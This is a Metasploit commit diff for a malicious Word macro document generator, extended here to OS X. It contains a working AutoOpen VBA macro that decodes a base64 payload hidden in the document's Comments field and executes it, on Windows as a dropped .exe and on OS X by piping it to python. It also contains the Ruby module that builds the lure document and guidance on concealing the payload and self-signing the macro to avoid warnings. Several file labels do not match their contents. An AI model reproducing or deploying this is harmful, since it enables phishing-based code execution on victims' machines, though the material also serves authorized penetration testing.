Land rapid7#7972, Microsoft Office Word Macro Generator OS X Edition

Author: wwebb-r7

data/exploits/office_word_macro/word/vbaData.xml

@@ -1,2 +1,2 @@
 <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
-<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>
+<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.NEWMACROS.AUTOOPEN" wne:name="Project.NewMacros.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

data/exploits/office_word_macro/word/vbaProject.bin

@@ -1,3 +1,4 @@
+
 ## Description
 
 This module generates a macro-enabled Microsoft Office Word document. It does not target a specific
@@ -8,25 +9,22 @@ There are many ways to create this type of malicious doc. The module injects the
 payload in the comments field, which will get decoded back by the macro and executed as a Windows
 executable when the Office document is launched.
 
-Please note: By default, Microsoft Office does not execute macros automatically. If a macro is
-present, the user will most likely need to manually click on the "Enable Content" button in order
-to run the macro.
-
 
 ## Vulnerable Application
 
-A Windows machine with Microsoft Office installed. The Office application must support the docm
+A Windows or OSX machine with Microsoft Office installed. The Office application must support the docm
 format.
 
 Specifically, this module was tested specifically against:
 
 * Microsoft Office 2010.
 * Microsoft Office 2013.
 * Microsoft Office 2016.
+* Microsoft Office Word 15.29.1 (161215).
 
 ## Verification Steps
 
-1. ```use exploit/windows/fileformat/office_word_macro```
+1. ```use exploit/multi/fileformat/office_word_macro```
 2. ```set PAYLOAD [PAYLOAD NAME]```
 3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc)
 4. ```exploit```
@@ -51,7 +49,7 @@ To use this exploit in a real environment, you will most likely need to modify t
 Here's one approach you can do:
 
 1. Use the module to generate the malicious docm
-2. Copy the malicious docm to a Windows machine, and edit it with Microsoft Office (such as 2013).
+2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013).
    When you open the document, the payload will probably do something on your machine. It's ok,
    since you generated it, it should not cause any problems for you.
 3. Save the doc, and test again to make sure the payload still works.
@@ -62,3 +60,38 @@ While editing, you should avoid modifying the following unless you are an advanc
   in front of the payload string. The blank space is for making the payload less obvious
   at first sight if the user views the file properties.
 * The VB code in the macro.
+
+## Trusted Document
+
+By default, Microsoft Office does not execute macros automatically unless it is considered as a
+trusted document. This means that if a macro is present, the user will most likely need to manually
+click on the "Enable Content" button in order to run the macro.
+
+Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick
+the user into allowing the macro to run. For example, making the document look like something
+written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory).
+
+To truly make the macro document to run without any warnings, you must somehow figure out a way to
+sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts.
+
+For testing purposes, another way to have a certificate is to create a self-signed one using
+Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on
+Windows:
+
+```
+C:\Program Files\Microsoft Office\root\Office16\SELFCERT.exe
+```
+
+In Office 2010, the self-signing tool is actually an option in the Office tools folder in the
+start menu. It should be named "Digital Certificate for VBA Projects".
+
+Double-click on the executable, enter a random name and click "OK", at this point you have a
+certificate to play with.
+
+Next, we want to flag this certificate as trusted:
+
+1. Click on Start, and then enter "Internet Options".
+2. Click on the Content tab, and then click on the Certificates button.
+3. You should see your new certificate under the Personal tab, export it.
+4. Click on the Trusted Publishers, and then import your personal certificate.
+5. Try the macro exploit again, it should run the malicious code without warning.

documentation/modules/exploit/windows/fileformat/office_word_macro.md renamed to documentation/modules/exploit/multi/fileformat/office_word_macro.md

@@ -1,3 +1,5 @@
+Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long
+
 Sub AutoOpen()
     On Error Resume Next
     Dim found_value As String
@@ -6,17 +8,31 @@ Sub AutoOpen()
         If prop.Name = "Comments" Then
             found_value = Mid(prop.Value, 56)
             orig_val = Base64Decode(found_value)
-            Set fso = CreateObject("Scripting.FileSystemObject")
-            tmp_folder = fso.GetSpecialFolder(2)
-            tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
-            Set f = fso.createTextFile(tmp_name)
-            f.Write (orig_val)
-            f.Close
-            CreateObject("WScript.Shell").Run (tmp_name)
+            #If Mac Then
+                ExecuteForOSX (orig_val)
+            #Else
+                ExecuteForWindows (orig_val)
+            #End If
+            Exit For
         End If
     Next
 End Sub
 
+Sub ExecuteForWindows(code)
+    On Error Resume Next
+    Set fso = CreateObject("Scripting.FileSystemObject")
+    tmp_folder = fso.GetSpecialFolder(2)
+    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
+    Set f = fso.createTextFile(tmp_name)
+    f.Write (code)
+    f.Close
+    CreateObject("WScript.Shell").Run (tmp_name)
+End Sub
+
+Sub ExecuteForOSX(code)
+    system ("echo """ & code & """ | python &")
+End Sub
+
 
 ' Decodes a base-64 encoded string (BSTR type).
 ' 1999 - 2004 Antonin Foller, http://www.motobit.com
@@ -27,31 +43,23 @@ Function Base64Decode(ByVal base64String)
   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
   Dim dataLength, sOut, groupBegin
 
-  'remove white spaces, If any
   base64String = Replace(base64String, vbCrLf, "")
   base64String = Replace(base64String, vbTab, "")
   base64String = Replace(base64String, " ", "")
 
-  'The source must consists from groups with Len of 4 chars
   dataLength = Len(base64String)
   If dataLength Mod 4 <> 0 Then
     Err.Raise 1, "Base64Decode", "Bad Base64 string."
     Exit Function
   End If
 
 
-  ' Now decode each group:
   For groupBegin = 1 To dataLength Step 4
     Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
-    ' Each data group encodes up To 3 actual bytes.
     numDataBytes = 3
     nGroup = 0
 
     For CharCounter = 0 To 3
-      ' Convert each character into 6 bits of data, And add it To
-      ' an integer For temporary storage.  If a character is a '=', there
-      ' is one fewer data byte.  (There can only be a maximum of 2 '=' In
-      ' the whole string.)
 
       thisChar = Mid(base64String, groupBegin + CharCounter, 1)
 
@@ -69,18 +77,14 @@ Function Base64Decode(ByVal base64String)
       nGroup = 64 * nGroup + thisData
     Next
 
-    'Hex splits the long To 6 groups with 4 bits
     nGroup = Hex(nGroup)
 
-    'Add leading zeros
     nGroup = String(6 - Len(nGroup), "0") & nGroup
 
-    'Convert the 3 byte hex integer (6 chars) To 3 characters
     pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
       Chr(CByte("&H" & Mid(nGroup, 5, 2)))
 
-    'add numDataBytes characters To out string
     sOut = sOut & Left(pOut, numDataBytes)
   Next
 

external/source/exploits/office_word_macro/macro.vba

@@ -0,0 +1,122 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::EXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microsoft Office Word Malicious Macro Execution",
+      'Description'    => %q{
+        This module generates a macro-enabled Microsoft Office Word document. The comments
+        metadata in the data is injected with a Base64 encoded payload, which will be
+        decoded by the macro and execute as a Windows executable.
+
+        For a successful attack, the victim is required to manually enable macro execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'sinn3r' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://en.wikipedia.org/wiki/Macro_virus']
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => true
+        },
+      'Targets'        =>
+        [
+          [
+            'Microsoft Office Word on Windows',
+            {
+              'Platform' => 'win',
+            }
+          ],
+          [
+            'Microsoft Office Word on Mac OS X (Python)',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jan 10 2012"
+    ))
+
+    register_options([
+      OptString.new("BODY", [false, 'The message for the document body',
+        'Contents of this document are protected. Please click Enable Content to continue.'
+      ]),
+      OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm'])
+    ], self.class)
+  end
+
+
+  def on_file_read(short_fname, full_fname)
+    buf = File.read(full_fname)
+
+    case short_fname
+    when /document\.xml/
+      buf.gsub!(/DOCBODYGOESHER/, datastore['BODY'])
+    when /core\.xml/
+      p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe
+      b64_payload = ' ' * 55
+      b64_payload << Rex::Text.encode_base64(p)
+      buf.gsub!(/PAYLOADGOESHERE/, b64_payload)
+    end
+
+    # The original filename of __rels is actually ".rels".
+    # But for some reason if that's our original filename, it won't be included
+    # in the archive. So this hacks around that.
+    case short_fname
+    when /__rels/
+      short_fname.gsub!(/\_\_rels/, '.rels')
+    end
+
+    yield short_fname, buf
+  end
+
+
+  def package_docm(path)
+    zip = Rex::Zip::Archive.new
+
+    Dir["#{path}/**/**"].each do |file|
+      p = file.sub(path+'/','')
+
+      if File.directory?(file)
+        print_status("Packaging directory: #{file}")
+        zip.add_file(p)
+      else
+        on_file_read(p, file) do |fname, buf|
+          print_status("Packaging file: #{fname}")
+          zip.add_file(fname, buf)
+        end
+      end
+    end
+
+    zip.pack
+  end
+
+
+  def exploit
+    print_status('Generating our docm file...')
+    path  = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro')
+    docm = package_docm(path)
+    file_create(docm)
+    super
+  end
+
+end

modules/exploits/multi/fileformat/office_word_macro.rb

@@ -11,6 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2017, 3, 16), 'exploit/multi/fileformat/office_word_macro')
 
   def initialize(info={})
     super(update_info(info,